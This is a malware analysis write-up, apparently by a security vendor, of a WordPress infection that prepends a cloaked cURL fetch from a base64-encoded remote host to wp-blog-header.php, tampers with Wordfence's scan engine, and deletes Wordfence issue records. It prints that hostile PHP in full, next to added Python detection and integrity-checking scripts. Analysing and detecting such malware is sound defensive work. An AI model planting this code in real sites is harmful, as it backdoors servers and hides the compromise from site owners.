We found a new and interesting piece of malware that infects WordPress and the Wordfence Security plugin. The malware's filename is a random number with a .php extension.
Unlink
When it is executed by a remote GET request, it first removes itself (unlink). That makes it difficult to know what happened on the server and what caused the infection of WordPress and Wordfence.
wp-blog-header.php
It modifies the WordPress wp-blog-header.php file by prepending code to the beginning of the file. The prepended code checks the requested URL (the filename extension and the query string) and the visitor's User-Agent, then fetches content from a remote server with cURL and either echoes it to the visitor or redirects the visitor to it.
The remote URL is BASE64 encoded: aHR0cDovL2RvbWZvcnVsdHJhZG9ycy5jb20vPw==
BASE64_DECODE: http://domforultradors.com/
Source of the infected wp-blog-header.php:
    $e = pathinfo($f = strtok($p = @$_SERVER["REQUEST_URI"], "?"), PATHINFO_EXTENSION);
    if ((!$e || in_array($e, array("html", "jpg", "png", "gif")) || basename($f, ".php") == "index")
        && in_array(strtok("="), array("", "p", "page_id"))
        && (empty($_SERVER["HTTP_USER_AGENT"])
            || (stripos($u = $_SERVER["HTTP_USER_AGENT"], "AhrefsBot") === false && stripos($u, "MJ12bot") === false))) {
        $at = "base64_" . "decode";
        $ch = curl_init($at("aHR0cDovL2RvbWZvcnVsdHJhZG9ycy5jb20vPw==") . "92877f004477c5605f97f9c527d0ec60" . $p);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HTTPHEADER, array("X-Forwarded-For: " . @$_SERVER["REMOTE_ADDR"]));
        if (isset($_SERVER["HTTP_USER_AGENT"])) curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
        if (isset($_SERVER["HTTP_REFERER"])) curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);
        $ci = "curl_ex" . "ec";
        $data = $ci($ch);
        $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if (strlen($data) > 255 && $code == 200) {
            echo $data;
            exit;
        } else if ($data && ($code == 301 || $code == 302)) {
            header("Location: " . trim($data), true, $code);
            exit;
        }
    }
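The injected code above avoids the obvious strings a grep would catch: the function names are split into two literals ("base64_" . "decode", "curl_ex" . "ec") and the remote host is base64 encoded. The following scanner, an added example and not code from the original post or from Malware Expert, reassembles split function names, decodes base64 literals that turn out to be URLs, and reports the cURL, crawler-cloaking and X-Forwarded-For indicators visible in the sample. The infected and clean file bodies are constructed stand-ins; the remote host (example.invalid) and the PLACEHOLDER_ID are not the real values.

```python
import base64
import re

# Indicators taken from the injected code quoted above.
SPLIT_FUNC_RE = re.compile(r'"(\w+)"\s*\.\s*"(\w+)"')      # e.g. "base64_" . "decode"
B64_RE = re.compile(r'[A-Za-z0-9+/]{16,}={0,2}')           # long base64-looking runs
DANGEROUS_FUNCS = {"base64_decode", "curl_exec", "eval", "system", "shell_exec", "assert"}
CLOAKED_BOTS = ("AhrefsBot", "MJ12bot")                    # crawlers the injection hides from


def split_function_names(php):
    """Reassemble function names split across two string literals, which a plain
    grep for base64_decode or curl_exec would miss."""
    found = set()
    for left, right in SPLIT_FUNC_RE.findall(php):
        name = (left + right).lower()
        if name in DANGEROUS_FUNCS:
            found.add(name)
    return found


def decode_b64_urls(php):
    """Return every base64 literal in the file that decodes to an http(s) URL."""
    urls = []
    for match in B64_RE.finditer(php):
        try:
            decoded = base64.b64decode(match.group(0), validate=True).decode("ascii")
        except Exception:
            continue        # not valid base64, or not text: skip it
        if decoded.startswith(("http://", "https://")):
            urls.append(decoded)
    return urls


def scan_wp_blog_header(php):
    """Return human-readable findings; an empty list means no indicator matched."""
    findings = []
    names = split_function_names(php)
    if names:
        findings.append("split function names: " + ", ".join(sorted(names)))
    urls = decode_b64_urls(php)
    if urls:
        findings.append("base64-encoded URL(s): " + ", ".join(urls))
    if "curl_init" in php or "curl_setopt" in php:
        findings.append("cURL call in a core bootstrap file")
    if any(bot in php for bot in CLOAKED_BOTS):
        findings.append("user-agent cloaking against SEO crawlers")
    if "X-Forwarded-For" in php and "REMOTE_ADDR" in php:
        findings.append("visitor IP forwarded to a remote host")
    return findings


# Constructed samples (not real files): a stand-in for the injected header and a clean one.
# The remote host and the id after it are placeholders, not the values from the real sample.
SAMPLE_B64_URL = base64.b64encode(b"http://example.invalid/?").decode()
INFECTED_SAMPLE = (
    '<?php\n'
    '$e = pathinfo($f = strtok($p = @$_SERVER["REQUEST_URI"], "?"), PATHINFO_EXTENSION);\n'
    'if ((!$e || in_array($e, array("html", "jpg"))) && (empty($_SERVER["HTTP_USER_AGENT"])\n'
    '    || stripos($_SERVER["HTTP_USER_AGENT"], "AhrefsBot") === false)) {\n'
    '    $at = "base64_" . "decode";\n'
    '    $ch = curl_init($at("' + SAMPLE_B64_URL + '") . "PLACEHOLDER_ID" . $p);\n'
    '    curl_setopt($ch, CURLOPT_HTTPHEADER, array("X-Forwarded-For: " . @$_SERVER["REMOTE_ADDR"]));\n'
    '    $ci = "curl_ex" . "ec";\n'
    '    $data = $ci($ch);\n'
    '}\n'
    "require_once __DIR__ . '/wp-load.php';\n"
)
CLEAN_SAMPLE = (
    "<?php\n"
    "if (!isset($wp_did_header)) {\n"
    "    $wp_did_header = true;\n"
    "    require_once __DIR__ . '/wp-load.php';\n"
    "    wp();\n"
    "    require_once ABSPATH . WPINC . '/template-loader.php';\n"
    "}\n"
)

if __name__ == "__main__":
    for label, body in (("infected", INFECTED_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(label, "->", scan_wp_blog_header(body) or "no indicators")
```

Run it against the real wp-blog-header.php of a site by reading the file into scan_wp_blog_header(); the clean WordPress bootstrap contains none of these indicators, so any finding on that file deserves a look.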
wfScanEngine.php
Next, the malware tries to modify the wfScanEngine.php file:
Original
    if (!is_array($this->knownFiles)) {
        throw new wfScanKnownFilesException("Invalid response from Wordfence servers.");
    }
Again, it prepends its own code before the original content. The unset() removes wp-blog-header.php, class-wp-upgrader.php and wfScanEngine.php itself from the list of known files that Wordfence compares against, and then stores the hash of the already modified class-wp-upgrader.php as its expected hash, so the scan no longer reports these files as changed:
Modified
    unset(
        $this->knownFiles["core"]["wp-blog-header.php"],
        $this->knownFiles["core"][$file = "wp-admin/includes/class-wp-upgrader.php"],
        $this->knownFiles["plugins"]["wp-content/plugins/wordfence/lib/wfScanEngine.php"]
    );
    if (method_exists("wordfenceHash", "wfHash")) {
        $hash = @wordfenceHash::wfHash(ABSPATH . $file);
        if (count($hash) > 1 && strlen($hash[1]) > 12) {
            $this->knownFiles["core"][$file] = strtoupper($hash[1]);
        }
    }
    if (!is_array($this->knownFiles)) {
        throw new wfScanKnownFilesException("Invalid response from Wordfence servers.");
    }
WordPress class-wp-upgrader.php
The third modification is to the WordPress class-wp-upgrader.php file. The inserted code runs after a plugin has been installed or updated: if the plugin is "wordfence", it rewrites lib/wfScanEngine.php with the same modification shown above, so updating Wordfence does not remove the tampering.
Original
    //Bombard the calling function will all the info which we've just used.
    return $this->result;
Modified
    //Bombard the calling function will all the info which we've just used.
    if ($destination_name == "wordfence" && ($data = file_get_contents($file = $destination . "lib/wfScanEngine.php"))) {
        $data = str_replace('if (!is_array($this->knownFiles))', 'unset($this->knownFiles["core"]["wp-blog-header.php"], $this->knownFiles["core"][$file = "wp-admin/includes/class-wp-upgrader.php"], $this->knownFiles["plugins"]["wp-content/plugins/wordfence/lib/wfScanEngine.php"]); if (method_exists("wordfenceHash", "wfHash")) { $hash = @wordfenceHash::wfHash(ABSPATH . $file); if (count($hash) > 1 && strlen($hash[1]) > 12) { $this->knownFiles["core"][$file] = strtoupper($hash[1]); } } if (!is_array($this->knownFiles))', $data, $count);
        if ($data && $count) {
            file_put_contents($file, $data);
        }
    }
    return $this->result;;
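Both the wfScanEngine.php and the class-wp-upgrader.php modifications attack the same thing: the list of known files that the scanner running inside the site compares against. A check that runs outside the site, against a manifest the site's own PHP cannot edit, has no such blind spot. The script below is an added example, not code from the original post or from Malware Expert: it verifies every path in a manifest of expected MD5 hashes, reports modified and missing files, and lists any .php file that no manifest entry covers (which is where a numeric-named dropper would show up). The three files, their hashes and the infection are constructed in a temporary directory. For a real site, the manifest for core files comes from the WordPress checksums API (https://api.wordpress.org/core/checksums/1.0/?version=VERSION&locale=LOCALE), which is what wp-cli's `wp core verify-checksums` uses.

```python
import hashlib
import os
import tempfile

# Paths the malware removes from Wordfence's knownFiles list (taken from the post).
HIDDEN_BY_MALWARE = (
    "wp-blog-header.php",
    "wp-admin/includes/class-wp-upgrader.php",
    "wp-content/plugins/wordfence/lib/wfScanEngine.php",
)


def md5_file(path):
    """Streamed MD5 of a file; WordPress publishes MD5 checksums for core files."""
    digest = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_tree(root, manifest):
    """Compare files under root with manifest {relative path: expected md5}.
    The manifest is held outside the site, so code running inside WordPress cannot
    unset() entries from it the way the injected wfScanEngine.php code does.
    Returns modified and missing paths, plus .php files no manifest entry covers."""
    report = {"modified": [], "missing": [], "unexpected": []}
    for rel, expected in manifest.items():
        path = os.path.join(root, rel)
        if not os.path.isfile(path):
            report["missing"].append(rel)
        elif md5_file(path).lower() != expected.lower():
            report["modified"].append(rel)
    for dirpath, _, names in os.walk(root):
        for name in names:
            rel = os.path.relpath(os.path.join(dirpath, name), root).replace(os.sep, "/")
            if rel.endswith(".php") and rel not in manifest:
                report["unexpected"].append(rel)
    return report


def build_fixture():
    """Constructed stand-in for a clean install: tiny files plus a manifest of their hashes."""
    root = tempfile.mkdtemp(prefix="wp-integrity-")
    for rel in HIDDEN_BY_MALWARE:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(b"<?php // constructed clean " + rel.encode() + b"\n")
    manifest = {rel: md5_file(os.path.join(root, rel)) for rel in HIDDEN_BY_MALWARE}
    return root, manifest


def simulate_infection(root):
    """Mimic the two filesystem effects described in the post: content prepended to
    wp-blog-header.php, and a numeric-named .php file in the web root (constructed name)."""
    header = os.path.join(root, "wp-blog-header.php")
    with open(header, "rb") as fh:
        original = fh.read()
    with open(header, "wb") as fh:
        fh.write(b"<?php /* constructed stand-in for the injected code */ ?>\n" + original)
    with open(os.path.join(root, "48213.php"), "wb") as fh:
        fh.write(b"<?php // constructed stand-in for the dropper\n")


if __name__ == "__main__":
    root, manifest = build_fixture()
    print("before:", verify_tree(root, manifest))
    simulate_infection(root)
    print("after: ", verify_tree(root, manifest))
```

Because wfScanEngine.php is a plugin file rather than core, its expected hash has to come from a separate trusted source, for example a hash recorded right after a clean install of the plugin; the comparison logic is the same.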
Last modification to database
Finally, the malware tries to remove all Wordfence issue records from the wp_wfIssues table in the database:
mysqli_query(mysqli_connect(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME), "delete from wp_wfIssues");
Final words
Websites using Malware Expert – ModSecurity rules are protected against this kind of attack.
Use Malware Expert – Signatures to detect this malware in files for FREE!